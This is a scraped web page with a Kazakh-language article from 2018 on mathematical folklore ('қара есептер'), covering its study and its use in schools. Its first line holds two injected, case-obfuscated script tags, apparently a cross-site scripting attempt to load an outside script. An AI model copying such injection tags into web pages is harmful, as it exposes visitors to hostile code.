<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.02.2018

Кез кел­ген халықтың фольклорындағы өзіндік ерекшелігі сол халықтың өмірі әрі тұрмыс – тіршілігімен, қоғамдық және мәдени да­му­ы­мен тығыз бай­ла­ныс­та екені дау ту­дыр­май­ды. Қазіргі таңда әлі өз зерттеушісін күтіп жатқан фольклордың үлкен екі са­ла­сы бар: олар — математикалық және түрме фольк­ло­ры. Фольк­лор­ды тар ауқымда ауыз­ша шығармашылық деп қана алушылық ТМД мен ре­сей ғылымында кең орын ал­са, фольк­лор­ды кең ауқымда қамту әлем фольк­ло­рис­ти­ка­сын­да ер­те­ден орныққан. Біз тек соңғы кон­цеп­ци­я­ны құптаймыз.

Математикалық фольк­лор­ды тер­мин ретінде ғылыми қолданысқа енгізген бол­гар ғалымдары: И. Ган­чев, К. Че­мев, Й. Сто­я­нов­тар бол­ды. Аталған зерттеушілер өз халқының 257 – ге тар­та сөз жұмбағын жи­нап, оған фольклорлық есеп­тер де­ген атау береді. Қазақтың қара есептері миф сияқты фольк­лор жинаушыларыдың та­ра­пы­нан дер кезінде жи­нал­май көпке дейін ескерусіз келді. Оның себебін бол­гар ғалымдары фольк­лор жинаушылардың математикалық сауатсыздығынан деп та­ни­ды.

Біз қазақ қара есептерінің ұлт фольклорындағы пай­да бо­лу кезеңдерін алаш жұрты же­ке эт­нос бо­лып қалыптасқанынан кейінгі аралықта : жап­пай математикалық сауаттылыққа дейін және жап­пай математикалық сауаттылықтан кейін шыққан қара есеп­тер деп шар­т­ты түрде екіге бөліп топтастырғанды жөн көрдік. Бұдан да сәтті топ­та­с­ты­ру­ды кейінгі зерттеушілер та­ба жа­тар. Еліміз егемендік алғанан кейін математикалық фольклорға қатысты зер­т­теу мақалалар белді ба­сы­лым­дар­да ара – кідік бой көрсетіп , халықтың қара есептері бас­та­у­ыш сыныпқа ар­нап ма­те­ма­ти­ка­дан оқулық жазған ав­тор­лар та­ра­пы­нан арифметикалық төрт амалға орай орын­ды пай­да­ла­ны­лып , шәкірттерге эт­но – педагогикалық тәлім – тәрбие бе­ру­де игі іс атқарып келеді.

Просмотров: 519


Пікір қосу



Деректерді қолтаңбаға қосу